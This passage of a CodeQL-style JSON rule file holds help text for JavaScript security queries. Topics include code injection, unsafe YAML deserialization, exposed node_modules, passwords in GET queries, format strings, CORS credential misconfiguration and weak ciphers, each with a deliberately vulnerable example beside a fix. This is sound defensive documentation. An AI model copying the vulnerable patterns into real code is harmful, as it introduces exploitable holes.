functions](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects#Function_properties).\n* MDN: [Function constructor](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Function).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n"},"properties":{"tags":["security","external/cwe/cwe-094"],"description":"Invoking user-controlled methods on certain objects can lead to remote code execution.","id":"js/unsafe-dynamic-method-access","kind":"path-problem","name":"Unsafe dynamic method access","precision":"high","problem.severity":"error","security-severity":"9.3"}},{"id":"js/bad-code-sanitization","name":"js/bad-code-sanitization","shortDescription":{"text":"Improper code sanitization"},"fullDescription":{"text":"Escaping code as HTML does not provide protection against code injection."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# Improper code sanitization\nUsing string concatenation to construct JavaScript code can be error-prone, or in the worst case, enable code injection if an input is constructed by an attacker.\n\n\n## Recommendation\nIf using `JSON.stringify` or an HTML sanitizer to sanitize a string inserted into JavaScript code, then make sure to perform additional sanitization or remove potentially dangerous characters.\n\n\n## Example\nThe example below constructs a function that assigns the number 42 to the property `key` on an object `obj`. However, if `key` contains `</script>`, then the generated code will break out of a `</script>` if inserted into a `</script>` tag.\n\n\n```javascript\nfunction createObjectWrite() {\n    const assignment = `obj[${JSON.stringify(key)}]=42`;\n    return `(function(){${assignment}})` // NOT OK\n}\n```\nThe issue has been fixed by escaping potentially dangerous characters, as shown below.\n\n\n```javascript\nconst charMap = {\n    '<': '\\\\u003C',\n    '>' : '\\\\u003E',\n    '/': '\\\\u002F',\n    '\\\\': '\\\\\\\\',\n    '\\b': '\\\\b',\n    '\\f': '\\\\f',\n    '\\n': '\\\\n',\n    '\\r': '\\\\r',\n    '\\t': '\\\\t',\n    '\\0': '\\\\0',\n    '\\u2028': '\\\\u2028',\n    '\\u2029': '\\\\u2029'\n};\n\nfunction escapeUnsafeChars(str) {\n    return str.replace(/[<>\\b\\f\\n\\r\\t\\0\\u2028\\u2029]/g, x => charMap[x])\n}\n\nfunction createObjectWrite() {\n    const assignment = `obj[${escapeUnsafeChars(JSON.stringify(key))}]=42`;\n    return `(function(){${assignment}})` // OK\n}\n```\n\n## References\n* OWASP: [Code Injection](https://www.owasp.org/index.php/Code_Injection).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n","markdown":"# Improper code sanitization\nUsing string concatenation to construct JavaScript code can be error-prone, or in the worst case, enable code injection if an input is constructed by an attacker.\n\n\n## Recommendation\nIf using `JSON.stringify` or an HTML sanitizer to sanitize a string inserted into JavaScript code, then make sure to perform additional sanitization or remove potentially dangerous characters.\n\n\n## Example\nThe example below constructs a function that assigns the number 42 to the property `key` on an object `obj`. However, if `key` contains `</script>`, then the generated code will break out of a `</script>` if inserted into a `</script>` tag.\n\n\n```javascript\nfunction createObjectWrite() {\n    const assignment = `obj[${JSON.stringify(key)}]=42`;\n    return `(function(){${assignment}})` // NOT OK\n}\n```\nThe issue has been fixed by escaping potentially dangerous characters, as shown below.\n\n\n```javascript\nconst charMap = {\n    '<': '\\\\u003C',\n    '>' : '\\\\u003E',\n    '/': '\\\\u002F',\n    '\\\\': '\\\\\\\\',\n    '\\b': '\\\\b',\n    '\\f': '\\\\f',\n    '\\n': '\\\\n',\n    '\\r': '\\\\r',\n    '\\t': '\\\\t',\n    '\\0': '\\\\0',\n    '\\u2028': '\\\\u2028',\n    '\\u2029': '\\\\u2029'\n};\n\nfunction escapeUnsafeChars(str) {\n    return str.replace(/[<>\\b\\f\\n\\r\\t\\0\\u2028\\u2029]/g, x => charMap[x])\n}\n\nfunction createObjectWrite() {\n    const assignment = `obj[${escapeUnsafeChars(JSON.stringify(key))}]=42`;\n    return `(function(){${assignment}})` // OK\n}\n```\n\n## References\n* OWASP: [Code Injection](https://www.owasp.org/index.php/Code_Injection).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n"},"properties":{"tags":["security","external/cwe/cwe-094","external/cwe/cwe-079","external/cwe/cwe-116"],"description":"Escaping code as HTML does not provide protection against code injection.","id":"js/bad-code-sanitization","kind":"path-problem","name":"Improper code sanitization","precision":"high","problem.severity":"error","security-severity":"6.1"}},{"id":"js/unsafe-deserialization","name":"js/unsafe-deserialization","shortDescription":{"text":"Deserialization of user-controlled data"},"fullDescription":{"text":"Deserializing user-controlled data may allow attackers to execute arbitrary code."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Deserialization of user-controlled data\nDeserializing untrusted data using any deserialization framework that allows the construction of arbitrary functions is easily exploitable and, in many cases, allows an attacker to execute arbitrary code.\n\n\n## Recommendation\nAvoid deserialization of untrusted data if at all possible. If the architecture permits it, then use formats like JSON or XML that cannot represent functions. When using YAML or other formats that support the serialization and deserialization of functions, ensure that the parser is configured to disable deserialization of arbitrary functions.\n\n\n## Example\nThe following example calls the `load` function of the popular `js-yaml` package on data that comes from an HTTP request and hence is inherently unsafe.\n\n\n```javascript\nconst app = require(\"express\")(),\n  jsyaml = require(\"js-yaml\");\n\napp.get(\"load\", function(req, res) {\n  let data = jsyaml.load(req.params.data);\n  // ...\n});\n\n```\nUsing the `safeLoad` function instead (which does not deserialize YAML-encoded functions) removes the vulnerability.\n\n\n```javascript\nconst app = require(\"express\")(),\n  jsyaml = require(\"js-yaml\");\n\napp.get(\"load\", function(req, res) {\n  let data = jsyaml.safeLoad(req.params.data);\n  // ...\n});\n\n```\n\n## References\n* OWASP vulnerability description: [Deserialization of untrusted data](https://www.owasp.org/index.php/Deserialization_of_untrusted_data).\n* OWASP guidance on deserializing objects: [Deserialization Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html).\n* Neal Poole: [Code Execution via YAML in JS-YAML Node.js Module](https://nealpoole.com/blog/2013/06/code-execution-via-yaml-in-js-yaml-nodejs-module/).\n* Common Weakness Enumeration: [CWE-502](https://cwe.mitre.org/data/definitions/502.html).\n","markdown":"# Deserialization of user-controlled data\nDeserializing untrusted data using any deserialization framework that allows the construction of arbitrary functions is easily exploitable and, in many cases, allows an attacker to execute arbitrary code.\n\n\n## Recommendation\nAvoid deserialization of untrusted data if at all possible. If the architecture permits it, then use formats like JSON or XML that cannot represent functions. When using YAML or other formats that support the serialization and deserialization of functions, ensure that the parser is configured to disable deserialization of arbitrary functions.\n\n\n## Example\nThe following example calls the `load` function of the popular `js-yaml` package on data that comes from an HTTP request and hence is inherently unsafe.\n\n\n```javascript\nconst app = require(\"express\")(),\n  jsyaml = require(\"js-yaml\");\n\napp.get(\"load\", function(req, res) {\n  let data = jsyaml.load(req.params.data);\n  // ...\n});\n\n```\nUsing the `safeLoad` function instead (which does not deserialize YAML-encoded functions) removes the vulnerability.\n\n\n```javascript\nconst app = require(\"express\")(),\n  jsyaml = require(\"js-yaml\");\n\napp.get(\"load\", function(req, res) {\n  let data = jsyaml.safeLoad(req.params.data);\n  // ...\n});\n\n```\n\n## References\n* OWASP vulnerability description: [Deserialization of untrusted data](https://www.owasp.org/index.php/Deserialization_of_untrusted_data).\n* OWASP guidance on deserializing objects: [Deserialization Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html).\n* Neal Poole: [Code Execution via YAML in JS-YAML Node.js Module](https://nealpoole.com/blog/2013/06/code-execution-via-yaml-in-js-yaml-nodejs-module/).\n* Common Weakness Enumeration: [CWE-502](https://cwe.mitre.org/data/definitions/502.html).\n"},"properties":{"tags":["security","external/cwe/cwe-502"],"description":"Deserializing user-controlled data may allow attackers to\n              execute arbitrary code.","id":"js/unsafe-deserialization","kind":"path-problem","name":"Deserialization of user-controlled data","precision":"high","problem.severity":"warning","security-severity":"9.8"}},{"id":"js/exposure-of-private-files","name":"js/exposure-of-private-files","shortDescription":{"text":"Exposure of private files"},"fullDescription":{"text":"Exposing a node_modules folder, or the project folder to the public, can cause exposure of private information."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Exposure of private files\nLibraries like `express` provide easy methods for serving entire directories of static files from a web server. However, using these can sometimes lead to accidental information exposure. If for example the `node_modules` folder is served, then an attacker can access the `_where` field from a `package.json` file, which gives access to the absolute path of the file.\n\n\n## Recommendation\nLimit which folders of static files are served from a web server.\n\n\n## Example\nIn the example below, all the files from the `node_modules` are served. This allows clients to easily access all the files inside that folder, which includes potentially private information inside `package.json` files.\n\n\n```javascript\n\nvar express = require('express');\n\nvar app = express();\n\napp.use('/node_modules', express.static(path.resolve(__dirname, '../node_modules')));\n```\nThe issue has been fixed below by only serving specific folders within the `node_modules` folder.\n\n\n```javascript\n\nvar express = require('express');\n\nvar app = express();\n\napp.use(\"jquery\", express.static('./node_modules/jquery/dist'));\napp.use(\"bootstrap\", express.static('./node_modules/bootstrap/dist'));\n```\n\n## References\n* OWASP: [Sensitive Data Exposure](https://www.owasp.org/index.php/Top_10-2017_A3-Sensitive_Data_Exposure).\n* Common Weakness Enumeration: [CWE-200](https://cwe.mitre.org/data/definitions/200.html).\n* Common Weakness Enumeration: [CWE-219](https://cwe.mitre.org/data/definitions/219.html).\n* Common Weakness Enumeration: [CWE-548](https://cwe.mitre.org/data/definitions/548.html).\n","markdown":"# Exposure of private files\nLibraries like `express` provide easy methods for serving entire directories of static files from a web server. However, using these can sometimes lead to accidental information exposure. If for example the `node_modules` folder is served, then an attacker can access the `_where` field from a `package.json` file, which gives access to the absolute path of the file.\n\n\n## Recommendation\nLimit which folders of static files are served from a web server.\n\n\n## Example\nIn the example below, all the files from the `node_modules` are served. This allows clients to easily access all the files inside that folder, which includes potentially private information inside `package.json` files.\n\n\n```javascript\n\nvar express = require('express');\n\nvar app = express();\n\napp.use('/node_modules', express.static(path.resolve(__dirname, '../node_modules')));\n```\nThe issue has been fixed below by only serving specific folders within the `node_modules` folder.\n\n\n```javascript\n\nvar express = require('express');\n\nvar app = express();\n\napp.use(\"jquery\", express.static('./node_modules/jquery/dist'));\napp.use(\"bootstrap\", express.static('./node_modules/bootstrap/dist'));\n```\n\n## References\n* OWASP: [Sensitive Data Exposure](https://www.owasp.org/index.php/Top_10-2017_A3-Sensitive_Data_Exposure).\n* Common Weakness Enumeration: [CWE-200](https://cwe.mitre.org/data/definitions/200.html).\n* Common Weakness Enumeration: [CWE-219](https://cwe.mitre.org/data/definitions/219.html).\n* Common Weakness Enumeration: [CWE-548](https://cwe.mitre.org/data/definitions/548.html).\n"},"properties":{"tags":["security","external/cwe/cwe-200","external/cwe/cwe-219","external/cwe/cwe-548"],"description":"Exposing a node_modules folder, or the project folder to the public, can cause exposure\n              of private information.","id":"js/exposure-of-private-files","kind":"problem","name":"Exposure of private files","precision":"high","problem.severity":"warning","security-severity":"6.5"}},{"id":"js/sensitive-get-query","name":"js/sensitive-get-query","shortDescription":{"text":"Sensitive data read from GET request"},"fullDescription":{"text":"Placing sensitive data in a GET request increases the risk of the data being exposed to an attacker."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Sensitive data read from GET request\nSensitive information such as user passwords should not be transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing sensitive information into the URL therefore increases the risk that it will be captured by an attacker.\n\n\n## Recommendation\nUse HTTP POST to send sensitive information as part of the request body; for example, as form data.\n\n\n## Example\nThe following example shows two route handlers that both receive a username and a password. The first receives this sensitive information from the query parameters of a GET request, which is transmitted in the URL. The second receives this sensitive information from the request body of a POST request.\n\n\n```javascript\nconst express = require('express');\nconst app = express();\napp.use(require('body-parser').urlencoded({ extended: false }))\n\n// bad: sensitive information is read from query parameters\napp.get('/login1', (req, res) => {\n    const user = req.query.user;\n    const password = req.query.password;\n    if (checkUser(user, password)) {\n        res.send('Welcome');\n    } else {\n        res.send('Access denied');\n    }\n});\n\n// good: sensitive information is read from post body\napp.post('/login2', (req, res) => {\n    const user = req.body.user;\n    const password = req.body.password;\n    if (checkUser(user, password)) {\n        res.send('Welcome');\n    } else {\n        res.send('Access denied');\n    }\n});\n\n```\n\n## References\n* CWE: [CWE-598: Use of GET Request Method with Sensitive Query Strings](https://cwe.mitre.org/data/definitions/598.html)\n* PortSwigger (Burp): [Password Submitted using GET Method](https://portswigger.net/kb/issues/00400300_password-submitted-using-get-method)\n* OWASP: [Information Exposure through Query Strings in URL](https://owasp.org/www-community/vulnerabilities/Information_exposure_through_query_strings_in_url)\n* Common Weakness Enumeration: [CWE-598](https://cwe.mitre.org/data/definitions/598.html).\n","markdown":"# Sensitive data read from GET request\nSensitive information such as user passwords should not be transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing sensitive information into the URL therefore increases the risk that it will be captured by an attacker.\n\n\n## Recommendation\nUse HTTP POST to send sensitive information as part of the request body; for example, as form data.\n\n\n## Example\nThe following example shows two route handlers that both receive a username and a password. The first receives this sensitive information from the query parameters of a GET request, which is transmitted in the URL. The second receives this sensitive information from the request body of a POST request.\n\n\n```javascript\nconst express = require('express');\nconst app = express();\napp.use(require('body-parser').urlencoded({ extended: false }))\n\n// bad: sensitive information is read from query parameters\napp.get('/login1', (req, res) => {\n    const user = req.query.user;\n    const password = req.query.password;\n    if (checkUser(user, password)) {\n        res.send('Welcome');\n    } else {\n        res.send('Access denied');\n    }\n});\n\n// good: sensitive information is read from post body\napp.post('/login2', (req, res) => {\n    const user = req.body.user;\n    const password = req.body.password;\n    if (checkUser(user, password)) {\n        res.send('Welcome');\n    } else {\n        res.send('Access denied');\n    }\n});\n\n```\n\n## References\n* CWE: [CWE-598: Use of GET Request Method with Sensitive Query Strings](https://cwe.mitre.org/data/definitions/598.html)\n* PortSwigger (Burp): [Password Submitted using GET Method](https://portswigger.net/kb/issues/00400300_password-submitted-using-get-method)\n* OWASP: [Information Exposure through Query Strings in URL](https://owasp.org/www-community/vulnerabilities/Information_exposure_through_query_strings_in_url)\n* Common Weakness Enumeration: [CWE-598](https://cwe.mitre.org/data/definitions/598.html).\n"},"properties":{"tags":["security","external/cwe/cwe-598"],"description":"Placing sensitive data in a GET request increases the risk of\n              the data being exposed to an attacker.","id":"js/sensitive-get-query","kind":"problem","name":"Sensitive data read from GET request","precision":"high","problem.severity":"warning","security-severity":"6.5"}},{"id":"js/tainted-format-string","name":"js/tainted-format-string","shortDescription":{"text":"Use of externally-controlled format string"},"fullDescription":{"text":"Using external input in format strings can lead to garbled output."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Use of externally-controlled format string\nFunctions like the Node.js standard library function `util.format` accept a format string that is used to format the remaining arguments by providing inline format specifiers. If the format string contains unsanitized input from an untrusted source, then that string may contain unexpected format specifiers that cause garbled output.\n\n\n## Recommendation\nEither sanitize the input before including it in the format string, or use a `%s` specifier in the format string, and pass the untrusted data as corresponding argument.\n\n\n## Example\nThe following program snippet logs information about an unauthorized access attempt. The log message includes the user name, and the user's IP address is passed as an additional argument to `console.log` to be appended to the message:\n\n\n```javascript\nconst app = require(\"express\")();\n\napp.get(\"unauthorized\", function handler(req, res) {\n  let user = req.query.user;\n  let ip = req.connection.remoteAddress;\n  console.log(\"Unauthorized access attempt by \" + user, ip);\n});\n\n```\nHowever, if a malicious user provides `%d` as their user name, `console.log` will instead attempt to format the `ip` argument as a number. Since IP addresses are not valid numbers, the result of this conversion is `NaN`. The resulting log message will read \"Unauthorized access attempt by NaN\", missing all the information that it was trying to log in the first place.\n\nInstead, the user name should be included using the `%s` specifier:\n\n\n```javascript\nconst app = require(\"express\")();\n\napp.get(\"unauthorized\", function handler(req, res) {\n  let user = req.query.user;\n  let ip = req.connection.remoteAddress;\n  console.log(\"Unauthorized access attempt by %s\", user, ip);\n});\n\n```\n\n## References\n* Node.js Documentation: [util.format](https://nodejs.org/api/util.html#util_util_format_format_args).\n* Common Weakness Enumeration: [CWE-134](https://cwe.mitre.org/data/definitions/134.html).\n","markdown":"# Use of externally-controlled format string\nFunctions like the Node.js standard library function `util.format` accept a format string that is used to format the remaining arguments by providing inline format specifiers. If the format string contains unsanitized input from an untrusted source, then that string may contain unexpected format specifiers that cause garbled output.\n\n\n## Recommendation\nEither sanitize the input before including it in the format string, or use a `%s` specifier in the format string, and pass the untrusted data as corresponding argument.\n\n\n## Example\nThe following program snippet logs information about an unauthorized access attempt. The log message includes the user name, and the user's IP address is passed as an additional argument to `console.log` to be appended to the message:\n\n\n```javascript\nconst app = require(\"express\")();\n\napp.get(\"unauthorized\", function handler(req, res) {\n  let user = req.query.user;\n  let ip = req.connection.remoteAddress;\n  console.log(\"Unauthorized access attempt by \" + user, ip);\n});\n\n```\nHowever, if a malicious user provides `%d` as their user name, `console.log` will instead attempt to format the `ip` argument as a number. Since IP addresses are not valid numbers, the result of this conversion is `NaN`. The resulting log message will read \"Unauthorized access attempt by NaN\", missing all the information that it was trying to log in the first place.\n\nInstead, the user name should be included using the `%s` specifier:\n\n\n```javascript\nconst app = require(\"express\")();\n\napp.get(\"unauthorized\", function handler(req, res) {\n  let user = req.query.user;\n  let ip = req.connection.remoteAddress;\n  console.log(\"Unauthorized access attempt by %s\", user, ip);\n});\n\n```\n\n## References\n* Node.js Documentation: [util.format](https://nodejs.org/api/util.html#util_util_format_format_args).\n* Common Weakness Enumeration: [CWE-134](https://cwe.mitre.org/data/definitions/134.html).\n"},"properties":{"tags":["security","external/cwe/cwe-134"],"description":"Using external input in format strings can lead to garbled output.","id":"js/tainted-format-string","kind":"path-problem","name":"Use of externally-controlled format string","precision":"high","problem.severity":"warning","security-severity":"7.3"}},{"id":"js/cors-misconfiguration-for-credentials","name":"js/cors-misconfiguration-for-credentials","shortDescription":{"text":"CORS misconfiguration for credentials transfer"},"fullDescription":{"text":"Misconfiguration of CORS HTTP headers allows for leaks of secret credentials."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# CORS misconfiguration for credentials transfer\nA server can send the `\"Access-Control-Allow-Credentials\"` CORS header to control when a browser may send user credentials in Cross-Origin HTTP requests.\n\nWhen the `Access-Control-Allow-Credentials` header is `\"true\"`, the `Access-Control-Allow-Origin` header must have a value different from `\"*\"` in order to make browsers accept the header. Therefore, to allow multiple origins for Cross-Origin requests with credentials, the server must dynamically compute the value of the `\"Access-Control-Allow-Origin\"` header. Computing this header value from information in the request to the server can therefore potentially allow an attacker to control the origins that the browser sends credentials to.\n\n\n## Recommendation\nWhen the `Access-Control-Allow-Credentials` header value is `\"true\"`, a dynamic computation of the `Access-Control-Allow-Origin` header must involve sanitization if it relies on user-controlled input.\n\nSince the `\"null\"` origin is easy to obtain for an attacker, it is never safe to use `\"null\"` as the value of the `Access-Control-Allow-Origin` header when the `Access-Control-Allow-Credentials` header value is `\"true\"`.\n\n\n## Example\nIn the example below, the server allows the browser to send user credentials in a Cross-Origin request. The request header `origins` controls the allowed origins for such a Cross-Origin request.\n\n\n```javascript\nvar https = require('https'),\n    url = require('url');\n\nvar server = https.createServer(function(){});\n\nserver.on('request', function(req, res) {\n    let origin = url.parse(req.url, true).query.origin;\n     // BAD: attacker can choose the value of origin\n    res.setHeader(\"Access-Control-Allow-Origin\", origin);\n    res.setHeader(\"Access-Control-Allow-Credentials\", true);\n\n    // ...\n});\n\n```\nThis is not secure, since an attacker can choose the value of the `origin` request header to make the browser send credentials to their own server. The use of a whitelist containing allowed origins for the Cross-Origin request fixes the issue:\n\n\n```javascript\nvar https = require('https'),\n    url = require('url');\n\nvar server = https.createServer(function(){});\n\nserver.on('request', function(req, res) {\n    let origin = url.parse(req.url, true).query.origin,\n        whitelist = {\n            \"https://example.com\": true,\n            \"https://subdomain.example.com\": true,\n            \"https://example.com:1337\": true\n        };\n\n    if (origin in whitelist) {\n        // GOOD: the origin is in the whitelist\n        res.setHeader(\"Access-Control-Allow-Origin\", origin);\n        res.setHeader(\"Access-Control-Allow-Credentials\", true);\n    }\n\n    // ...\n});\n\n```\n\n## References\n* Mozilla Developer Network: [CORS, Access-Control-Allow-Origin](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Access-Control-Allow-Origin).\n* Mozilla Developer Network: [CORS, Access-Control-Allow-Credentials](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Access-Control-Allow-Credentials).\n* PortSwigger: [Exploiting CORS Misconfigurations for Bitcoins and Bounties](http://blog.portswigger.net/2016/10/exploiting-cors-misconfigurations-for.html)\n* W3C: [CORS for developers, Advice for Resource Owners](https://w3c.github.io/webappsec-cors-for-developers/#resources)\n* Common Weakness Enumeration: [CWE-346](https://cwe.mitre.org/data/definitions/346.html).\n* Common Weakness Enumeration: [CWE-639](https://cwe.mitre.org/data/definitions/639.html).\n* Common Weakness Enumeration: [CWE-942](https://cwe.mitre.org/data/definitions/942.html).\n","markdown":"# CORS misconfiguration for credentials transfer\nA server can send the `\"Access-Control-Allow-Credentials\"` CORS header to control when a browser may send user credentials in Cross-Origin HTTP requests.\n\nWhen the `Access-Control-Allow-Credentials` header is `\"true\"`, the `Access-Control-Allow-Origin` header must have a value different from `\"*\"` in order to make browsers accept the header. Therefore, to allow multiple origins for Cross-Origin requests with credentials, the server must dynamically compute the value of the `\"Access-Control-Allow-Origin\"` header. Computing this header value from information in the request to the server can therefore potentially allow an attacker to control the origins that the browser sends credentials to.\n\n\n## Recommendation\nWhen the `Access-Control-Allow-Credentials` header value is `\"true\"`, a dynamic computation of the `Access-Control-Allow-Origin` header must involve sanitization if it relies on user-controlled input.\n\nSince the `\"null\"` origin is easy to obtain for an attacker, it is never safe to use `\"null\"` as the value of the `Access-Control-Allow-Origin` header when the `Access-Control-Allow-Credentials` header value is `\"true\"`.\n\n\n## Example\nIn the example below, the server allows the browser to send user credentials in a Cross-Origin request. The request header `origins` controls the allowed origins for such a Cross-Origin request.\n\n\n```javascript\nvar https = require('https'),\n    url = require('url');\n\nvar server = https.createServer(function(){});\n\nserver.on('request', function(req, res) {\n    let origin = url.parse(req.url, true).query.origin;\n     // BAD: attacker can choose the value of origin\n    res.setHeader(\"Access-Control-Allow-Origin\", origin);\n    res.setHeader(\"Access-Control-Allow-Credentials\", true);\n\n    // ...\n});\n\n```\nThis is not secure, since an attacker can choose the value of the `origin` request header to make the browser send credentials to their own server. The use of a whitelist containing allowed origins for the Cross-Origin request fixes the issue:\n\n\n```javascript\nvar https = require('https'),\n    url = require('url');\n\nvar server = https.createServer(function(){});\n\nserver.on('request', function(req, res) {\n    let origin = url.parse(req.url, true).query.origin,\n        whitelist = {\n            \"https://example.com\": true,\n            \"https://subdomain.example.com\": true,\n            \"https://example.com:1337\": true\n        };\n\n    if (origin in whitelist) {\n        // GOOD: the origin is in the whitelist\n        res.setHeader(\"Access-Control-Allow-Origin\", origin);\n        res.setHeader(\"Access-Control-Allow-Credentials\", true);\n    }\n\n    // ...\n});\n\n```\n\n## References\n* Mozilla Developer Network: [CORS, Access-Control-Allow-Origin](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Access-Control-Allow-Origin).\n* Mozilla Developer Network: [CORS, Access-Control-Allow-Credentials](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Access-Control-Allow-Credentials).\n* PortSwigger: [Exploiting CORS Misconfigurations for Bitcoins and Bounties](http://blog.portswigger.net/2016/10/exploiting-cors-misconfigurations-for.html)\n* W3C: [CORS for developers, Advice for Resource Owners](https://w3c.github.io/webappsec-cors-for-developers/#resources)\n* Common Weakness Enumeration: [CWE-346](https://cwe.mitre.org/data/definitions/346.html).\n* Common Weakness Enumeration: [CWE-639](https://cwe.mitre.org/data/definitions/639.html).\n* Common Weakness Enumeration: [CWE-942](https://cwe.mitre.org/data/definitions/942.html).\n"},"properties":{"tags":["security","external/cwe/cwe-346","external/cwe/cwe-639","external/cwe/cwe-942"],"description":"Misconfiguration of CORS HTTP headers allows for leaks of secret credentials.","id":"js/cors-misconfiguration-for-credentials","kind":"path-problem","name":"CORS misconfiguration for credentials transfer","precision":"high","problem.severity":"error","security-severity":"7.5"}},{"id":"js/weak-cryptographic-algorithm","name":"js/weak-cryptographic-algorithm","shortDescription":{"text":"Use of a broken or weak cryptographic algorithm"},"fullDescription":{"text":"Using broken or weak cryptographic algorithms can compromise security."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Use of a broken or weak cryptographic algorithm\nUsing broken or weak cryptographic algorithms may compromise security guarantees such as confidentiality, integrity, and authenticity.\n\nMany cryptographic algorithms are known to be weak or flawed. The security guarantees of a system often rely on the underlying cryptography, so using a weak algorithm can have severe consequences. For example:\n\n* If a weak encryption algorithm is used, an attacker may be able to decrypt sensitive data.\n* If a weak hashing algorithm is used to protect data integrity, an attacker may be able to craft a malicious input that has the same hash as a benign one.\n* If a weak algorithm is used for digital signatures, an attacker may be able to forge signatures and impersonate legitimate users.\n\n## Recommendation\nEnsure that you use a strong, modern cryptographic algorithm. Use at least AES-128 or RSA-2048 for encryption, and SHA-2 or SHA-3 for secure hashing.\n\n\n## Example\nThe following code shows an example of using the builtin cryptographic library of NodeJS to encrypt some secret data. When creating a `Cipher` instance to encrypt the secret data with, you must specify the encryption algorithm to use. The first example uses DES, which is an older algorithm that is now considered weak. The second example uses AES, which is a strong modern algorithm.\n\n\n```javascript\nconst crypto = require('crypto');\n\nvar secretText = obj.getSecretText();\n\nconst desCipher = crypto.createCipher('des', key);\nlet desEncrypted = desCipher.write(secretText, 'utf8', 'hex'); // BAD: weak encryption\n\nconst aesCipher = crypto.createCipher('aes-128', key);\nlet aesEncrypted = aesCipher.update(secretText, 'utf8', 'hex'); // GOOD: strong encryption\n\n```\n\n## References\n* NIST, FIPS 140 Annex a: [ Approved Security Functions](http://csrc.nist.gov/publications/fips/fips140-2/fips1402annexa.pdf).\n* NIST, SP 800-131A: [ Transitions: Recommendation for Transitioning the Use of Cryptographic Algorithms and Key Lengths](http://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-131Ar1.pdf).\n* OWASP: [Rule - Use strong approved cryptographic algorithms](https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#rule---use-strong-approved-authenticated-encryption).\n* Common Weakness Enumeration: [CWE-327](https://cwe.mitre.org/data/definitions/327.html).\n* Common Weakness Enumeration: [CWE-328](https://cwe.mitre.org/data/definitions/328.html).\n","markdown":"# Use of a broken or weak cryptographic algorithm\nUsing broken or weak cryptographic algorithms may compromise security guarantees such as confidentiality, integrity, and authenticity.\n\nMany cryptographic algorithms are known to be weak or flawed. The security guarantees of a system often rely on the underlying cryptography, so using a weak algorithm can have severe consequences. For example:\n\n* If a weak encryption algorithm is used, an attacker may be able to decrypt sensitive data.\n* If a weak hashing algorithm is used to protect data integrity, an attacker may be able to craft a malicious input that has the same hash as a benign one.\n* If a weak algorithm is used for digital signatures, an attacker may be able to forge signatures and impersonate legitimate users.\n\n## Recommendation\nEnsure that you use a strong, modern cryptographic algorithm. Use at least AES-128 or RSA-2048 for encryption, and SHA-2 or SHA-3 for secure hashing.\n\n\n## Example\nThe following code shows an example of using the builtin cryptographic library of NodeJS to encrypt some secret data. When creating a `Cipher` instance to encrypt the secret data with, you must specify the encryption algorithm to use. The first example uses DES, which is an older algorithm that is now considered weak. The second example uses AES, which is a strong modern algorithm.\n\n\n```javascript\nconst crypto = require('crypto');\n\nvar secretText = obj.getSecretText();\n\nconst desCipher = crypto.createCipher('des', key);\nlet desEncrypted = desCipher.write(secretText, 'utf8', 'hex'); // BAD: weak encryption\n\nconst aesCipher = crypto.createCipher('aes-128', key);\nlet aesEncrypted = aesCipher.update(secretText, 'utf8', 'hex'); // GOOD: strong encryption\n\n```\n\n## References\n* NIST, FIPS 140 Annex a: [ Approved Security Functions](http://csrc.nist.gov/publications/fips/fips140-2/fips1402annexa.pdf).\n* NIST, SP 800-131A: [ Transitions: Recommendation for Transitioning the Use of Cryptographic Algorithms and Key Lengths](http://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-131Ar1.pdf).\n* OWASP: [Rule - Use strong approved cryptographic algorithms](https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#rule---use-strong-approved-authenticated-encryption).\n* Common Weakness Enumeration: [CWE-327](https://cwe.mitre.org/data/definitions/327.html).\n* Common Weakness Enumeration: [CWE-328](https://cwe.mitre.org/data/definitions/328.html).\n"},"properties":{"tags":["security","external/cwe/cwe-327","external/cwe/cwe-328"],"description":"Using broken or weak cryptographic algorithms can compromise security.","id":"js/weak-cryptographic-algorithm","kind":"path-problem","name":"Use of a broken or weak cryptographic algorithm","precision":"high","problem.severity":"warning","security-severity":"7.5"}},{"id":"js/biased-cryptographic-random","name":"js/biased-cryptographic-random","shortDescription":{"text":"Creating biased random numbers from a cryptographically secure source"},"fullDescription":{"text":"Some mathematical operations on random numbers can cause bias in the results and compromise security."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Creating biased random numbers from a cryptographically secure source\nGenerating secure random numbers can be an important part of creating a secure software system. This can be done using APIs that create cryptographically secure random numbers.\n\nHowever, using some mathematical operations on these cryptographically secure random numbers can create biased results, where some outcomes are more likely than others. Such biased results 